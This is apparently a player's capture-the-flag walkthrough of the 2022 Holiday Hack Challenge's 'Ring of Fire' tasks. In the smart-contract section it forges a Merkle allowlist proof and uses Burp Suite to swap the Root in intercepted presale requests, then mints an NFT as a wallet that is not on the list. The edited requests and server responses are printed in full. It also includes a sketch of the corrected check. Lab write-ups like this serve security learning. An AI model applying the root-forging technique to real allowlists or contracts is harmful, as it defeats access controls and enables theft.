HHC 2022 - Ring of Fire Walkthrough

The walkthrough for the Ring of Fire, the LAST of 5 rings in the 2022 Holiday Hack Challenge! GLORY!

This set of challenges is unique to each user, meaning many of the values used throughout the walkthrough are tied to the user's Wallet Address, Key, and other related values. Copying and pasting commands verbatim from this walkthrough will likely NOT lead to a valid answer. Be sure to follow the instructions carefully. If you do, you will receive much GLORRRYYYYYYYY!

5.1 Buy a Hat

Objective

Travel to the Burning Ring of Fire and purchase a hat from the vending machine with KringleCoin. Find hints for this objective hidden throughout the tunnels.

Hints

  • Before you can purchase something with KringleCoin, you must first approve the financial transaction. To do this, you need to find a KTM; there is one in the Burning Ring of Fire. Select the Approve a KringleCoin transfer button. You must provide the target wallet address, the amount of the transaction you're approving, and your private wallet key.
  • To purchase a hat, first find the hat vending machine in the Burning Ring of Fire. Select the hat that you think will give your character a bold and jaunty look, and click on it. A window will open giving you instructions on how to proceed with your purchase.
  • You should have been given a target address and a price by the Hat Vending machine. You should also have been given a Hat ID #. Approve the transaction and then return to the Hat Vending machine. You'll be asked to provide the Hat ID and your wallet address. Complete the transaction and wear your hat proudly!

Walkthrough

We click on the vending machine located inside the Burning Ring of Fire Hall. It displays a large selection of hats. We find a hat that we like, or just one we find tolerable enough to complete the task.

A prompt loads with the instructions.

To purchase this hat you must:

  1. Use a KTM to pre-approve a 10 KC transaction to the wallet address: 0x4228cc9639304eD6Ef0Ba5668964348eC9D47d9A
  2. Return to this kiosk and use Hat ID: 526 to complete your purchase.
Note: the Wallet address will be the same for every hat. However, the Hat ID is specific to the one you selected.

We need the private key and Wallet address that was given to us during the initial setup of the game, all the way back during Orientation.

Using the KC ATM

We navigate to the KC ATM, located to the right of the vending machine, and click Approve a KringleCoin transfer.

Enter the following values:

  • "To" Address: 0x4228cc9639304eD6Ef0Ba5668964348eC9D47d9A
  • Amount (KC): 10
  • Your Key: <Your Key>
Note: Be sure to enter your Key value and not your WalletAddress value. Entering in the latter will likely prevent a successful transfer from occurring.

Click Approve Transfer.

Navigate back to the vending machine, click on it and select the Click Here to buy

Enter the following values into the text fields:

  • Your Wallet Address: <Your WALLETADDRESS! >
    Note: this is NOT your Key. Entering your key will likely generate an error message. Be sure to enter your WalletAddress, which was generated during Orientation.
  • Hat ID: 526
    Note: using the example from above, we enter 526. If you chose a different Hat, use the corresponding Hat ID.

Click on Make your purchase!

5.2 Blockchain Divination

Objective

Use the Blockchain Explorer in the Burning Ring of Fire to investigate the contracts and transactions on the chain. At what address is the KringleCoin smart contract deployed? Find hints for this objective hidden throughout the tunnels.

Hints

  • Find a transaction in the blockchain where someone sent or received KringleCoin! The Solidity Source File is listed as KringleCoin.sol. Tom's Talk might be helpful!
  • Look at the transaction information. There is a From: address and a To: address. The To: address lists the address of the KringleCoin smart contract.

Walkthrough

The hints lay the steps out fairly directly. The trickiest part might be finding the Blockchain Explorer, which is located on the lower level of the Burning Ring of Fire Hall. Descend the ladder, and move to the back corner of the lower level. Click on the computer located in the very last space of the room. If a page loads that says BSRS with a Sporc skull, you haven't traveled far enough; move farther to the right, and click on the beige-ish looking computer.

Clicking on the proper terminal loads the Blockchain Explorer (named in the page title). Using the arrows at the top of the Blockchain Explorer, we look for a transaction whose Solidity source mentions KringleCoin; for example, the one in Block #77961:

Within the block, we look for the "to" value:

Answer

Enter the address as the value within the Objectives pane: 0xc27A2D3DE339Ce353c0eFBa32e948a88F1C86554

5.3 Exploit a Smart Contract

Objective

Exploit flaws in a smart contract to buy yourself a Bored Sporc NFT. Find hints for this objective hidden throughout the tunnels.

Smart Contract Hints

Walkthrough

We navigate to the terminal that shows the BSRS web page. The terminal/screen is located just below the "BSRS" sign. Click on the web page.

Click on the Presale link at the top of the page.  This loads the instructions to mint a BSRB. The instructions are a general framework of how to attack the smart contract, so be sure to read carefully:

Pre-Purchase Instructions

Here's all you gotta do to pre-purchase your Sporc:

1.  The presale price for a Sporc is 100 KringleCoin (KC). Yeah, we know that's crazy cheap, but we take care of our buds. When we open sales to the public, these things are gonna shoot to the moon.
2.  First, you're gonna want to make sure that your wallet address is on the approved list. Just make sure to leave the "Validate only" box checked, fill in the form, and we'll let you know if you're good-to-go. Before you do anything else, it's always good to be sure you're doing everything right and your address is validated as being on the list (it's actually something called a Merkle Tree... very high-techy-techy stuff).
3.  To check if you're on the list, enter your wallet address and the string of proof values that we gave you when we told you that you were on the pre-approved list. Those values should be hex strings (i.e. start with "0x" and consist of a bunch of values that are 0-9 or "a," "b," "c," "d," "e," or "f"). If you're confused, give us a shout and we can help.
4.  If you're not on the presale list, **_you're not on the list_**. Don't beg and plead with us to put you on the list. Seriously - we've only put Sporcs that we're tight with on the list. _**WE**_ decided who's on the list (COOL SPORCS ONLY). We don't just let **_anyone_** on. If we were putting you on the list, we would've contacted you... not the other way around.
5.  Once you've confirmed everything works and you're sure you have the whole _validated-and-on-the-list_ thing down, just go find a KTM and pre-approve a 100 KC transaction from the wallet you validated. That way, the funds are ready to go. Our Wallet Address is 0xe8fC6f6a76BE243122E3d01A1c544F87f1264d3a.
6.  Once you've pre-approved the payment, come back here do the same thing you did when you validated your address, just uncheck the "Validate Only" thing. Then, we'll grab your K'Coin, mint a brand spankin' new Sporc, and fire it into your wallet. Zap! Just like that, you'll be the owner of an amazing piece of the digital domain and a member of the Bored Sporc Rowboat Society for life! (Or, until you decide to cash-out and sell your Bored Sporc).

Scrolling down further on the Presale page shows a form with text fields for a Wallet Address and Proof Values, plus a Validate Only checkbox (which is checked by default).

If you're reading this and thinking "I never joined a presale list", the goal will be to attack the blockchain to make it appear as if you had.

We will need to collect a few things in order to "attack" the blockchain.

Step 2 - Validate Wallet Address

Following the Pre-Purchase Instructions above, we proceed at Step 2.

The subsequent sections that refer to "Step X" are also referring to the Pre-Purchase instructions step.

Cloning the Github Repo

The hint mentions a GitHub repo that "might be useful" (read: you'll want to use it). Clone the repo to your local system using git clone. It contains a merkle_tree.py file, which will be leveraged for the attack. Be sure to reference the Smart Contract Hints, which provide a few links for additional context around Merkle trees.

Editing & Running merkle_tree.py

Edit the merkle_tree.py file, specifically line 150. Set the value of allowlist to be a list. The first value of the list should be YOUR Wallet address (it will vary from the one displayed below). The second value of the list should be the address of BSRS, 0xe8fC6f6a76BE243122E3d01A1c544F87f1264d3a.

┌──(kali㉿kali)-[~/…/CTFs/holidayhack2022/ringoffire/Merkle_Trees]
└─$ cat merkle_tree.py | grep -n ^allowlist                                       
150:allowlist = ['YOUR-KRINGLECOIN-WALLETADDRESS-HERE','0xe8fC6f6a76BE243122E3d01A1c544F87f1264d3a']

Note: it is important to make the list in the order of allowlist[0] = <Your wallet Address Here> and allowlist[1] = 0xe8fC6f6a76BE243122E3d01A1c544F87f1264d3a.  Doing it in any other order generates the incorrect proof value.

Run the merkle_tree.py script which will generate a Root and Proof Value.

┌──(kali㉿kali)-[~/…/CTFs/holidayhack2022/ringoffire/Merkle_Trees]
└─$ python3 merkle_tree.py                                                                                       1 ⚙
Root: 0xe62e314a4c8f25fae3edd0a22d95d6d33a2f2f88ccebaadc71be8cd86224ded9
Proof: ['0x0f1859b20c631beeedaae52fee2404ce14f333209d62f94d3034b298fd91a860']

Intercepting the Pre-Sale Validation

We navigate back to the BSRS Pre-Sale page, turn Burpsuite Intercept on, and enter our wallet address, along with the Proof value from the merkle_tree.py script in the Proof Value field. We also ensure the Validate Only box is checked, and click Go!

We intercept the POST request to /cgi-bin/presale, and change the value of the payload.

From this:


{"WalletID":"0x3Fa400B96Cf38697f58C57885148e18875bA5b98",
 "Root":"0x52cfdfdcba8efebabd9ecc2c60e6f482ab30bdc6acf8f9bd0600de83701e15f1",
 "Proof":"0x0f1859b20c631beeedaae52fee2404ce14f333209d62f94d3034b298fd91a860",
 "Validate":"true",
 "Session":"4d3a6708-8598-4f83-8bb6-e2c98b243924"}

To this:

{"WalletID":"0x3Fa400B96Cf38697f58C57885148e18875bA5b98",
 "Root":"0xe62e314a4c8f25fae3edd0a22d95d6d33a2f2f88ccebaadc71be8cd86224ded9",
 "Proof":"0x0f1859b20c631beeedaae52fee2404ce14f333209d62f94d3034b298fd91a860",
 "Validate":"true",
 "Session":"4d3a6708-8598-4f83-8bb6-e2c98b243924"}

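We replace the value of Root with the output from our merkle_tree.py script (EACH ROOT VALUE WILL BE SPECIFIC TO EACH USER, DO NOT COPY IN THE VALUES FROM THIS WALKTHROUGH). The request itself carries the Root that the proof is checked against, so a proof built against our own two-entry tree validates. Send the edited request along, and we receive a response: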

{"Response": "You're on the list and good to go! Now... BUY A SPORC!"}
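
The step above works because the Root used for verification arrives in the request. As an added example (not code from the challenge or from merkle_tree.py), the sketch below contrasts a check that trusts the request's Root with one that pins the root server-side. It assumes SHA3-256 as a stand-in for keccak256, a constructed four-address presale list, and hypothetical function names.

```python
import hashlib

def h(data: bytes) -> bytes:
    # Stand-in for keccak256 (assumption): SHA3-256 keeps this stdlib-only.
    return hashlib.sha3_256(data).digest()

def unhex(s: str) -> bytes:
    return bytes.fromhex(s[2:])

def hash_pair(a: bytes, b: bytes) -> bytes:
    # Sorted-pair hashing, so proofs need no left/right markers.
    return h(min(a, b) + max(a, b))

def build_levels(addresses):
    level = [h(unhex(a)) for a in addresses]
    levels = [level]
    while len(level) > 1:
        level = [hash_pair(*level[i:i + 2]) if i + 1 < len(level) else level[i]
                 for i in range(0, len(level), 2)]
        levels.append(level)
    return levels

def make_proof(levels, index):
    proof = []
    for level in levels[:-1]:
        if (index ^ 1) < len(level):
            proof.append(level[index ^ 1])
        index //= 2
    return proof

def verify(root: bytes, address: str, proof) -> bool:
    node = h(unhex(address))
    for sibling in proof:
        node = hash_pair(node, sibling)
    return node == root

def build_request(wallet, allowlist):
    levels = build_levels(allowlist)
    proof = make_proof(levels, allowlist.index(wallet))
    return {"WalletID": wallet, "Root": "0x" + levels[-1][0].hex(),
            "Proof": ["0x" + p.hex() for p in proof]}

# Constructed sample data: a four-address presale list and an address not on it.
PRESALE = ["0x" + f"{i:040x}" for i in range(1, 5)]
PINNED_ROOT = build_levels(PRESALE)[-1][0]  # kept server-side / in the contract
OUTSIDER = "0x" + "ab" * 20

def check_trusting_request_root(req) -> bool:
    # Weak form: the root being verified against comes from the caller.
    return verify(unhex(req["Root"]), req["WalletID"], [unhex(p) for p in req["Proof"]])

def check_pinned_root(req) -> bool:
    # Corrected form: any Root field in the request is ignored.
    return verify(PINNED_ROOT, req["WalletID"], [unhex(p) for p in req["Proof"]])
```

With the root pinned, a request built from a self-made allowlist fails while a genuine member's proof still passes.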

Step 5 - Send 100 KC to BSRS

Don't worry, we send 100 KC away, but will receive 100 KC as a result of completing this challenge.  (We'll still have plenty of KC to stake in the near future!! GLORRRYYYY! Apologies for the redundant cryptocurrency joke)

We navigate back to the KC ATM on the floor above and repeat the steps from Using the KC ATM above, with the following values:

  • "To" Address: 0xe8fC6f6a76BE243122E3d01A1c544F87f1264d3a (the address of the BSRS)
  • Amount (KC): 100
  • Your Key: <Your Key value received during KringleCon Orientation>

Click Approve Transfer.

Step 6 - Mint a Sporc

Repeat the steps found in Intercepting the Pre-Sale Validation above. Enter the same values in the Wallet Address and Proof Values fields. The distinguishing change from Step 2 is to make sure that the Validate Only box is unchecked. In the Burpsuite request, this will show as "Validate":"false". Make sure Burpsuite Intercept is on.

Original request:

{"WalletID":"0x3Fa400B96Cf38697f58C57885148e18875bA5b98",
 "Root":"0x52cfdfdcba8efebabd9ecc2c60e6f482ab30bdc6acf8f9bd0600de83701e15f1",
 "Proof":"0x0f1859b20c631beeedaae52fee2404ce14f333209d62f94d3034b298fd91a860",
 "Validate":"false",
 "Session":"f38146a3-731b-4b85-8b20-433f5712c0b8"}

Edited request:

{"WalletID":"0x3Fa400B96Cf38697f58C57885148e18875bA5b98",
 "Root":"0xe62e314a4c8f25fae3edd0a22d95d6d33a2f2f88ccebaadc71be8cd86224ded9",
 "Proof":"0x0f1859b20c631beeedaae52fee2404ce14f333209d62f94d3034b298fd91a860",
 "Validate":"false",
 "Session":"f38146a3-731b-4b85-8b20-433f5712c0b8"}

Send the request along, and receive the response below from the server (hyperlink mentioned will be specific to each user):

{"Response": "Success! You are now the proud owner of BSRS Token #000284. You can find more information at https://boredsporcrowboatsociety.com/TOKENS/BSRS284, or check it out in the gallery!<br>Transaction: 0x69e9747beef7deead79494b17645916ecde951a437f74b7442b54678352ab76e, Block: 78107<br><br>Remember: Just like we planned, tell everyone you know to <u><em>BUY A BoredSporc</em></u>.<br>When general sales start, and the humans start buying them up, the prices will skyrocket, and we all sell at once!<br><br>The market will tank, but we'll all be rich!!!"}

https://boredsporcrowboatsociety.com/TOKENS/TOKENIMAGES/BSRS284.png

My Sporc is festive, and gives off a "it's cold outside" vibe.

GLORRRYYYYYY

We have successfully recovered the Burning Ring of Fire, and recovered all 5 rings! We can navigate back to the North Pole (using the Destinations shortcut!) and enter Santa's Castle, located slightly northwest of the KringleCon entrance. Enter and interact with each of the characters to finish the storyline, and even have an opportunity to buy some swag available only to those who complete the entire HHC!
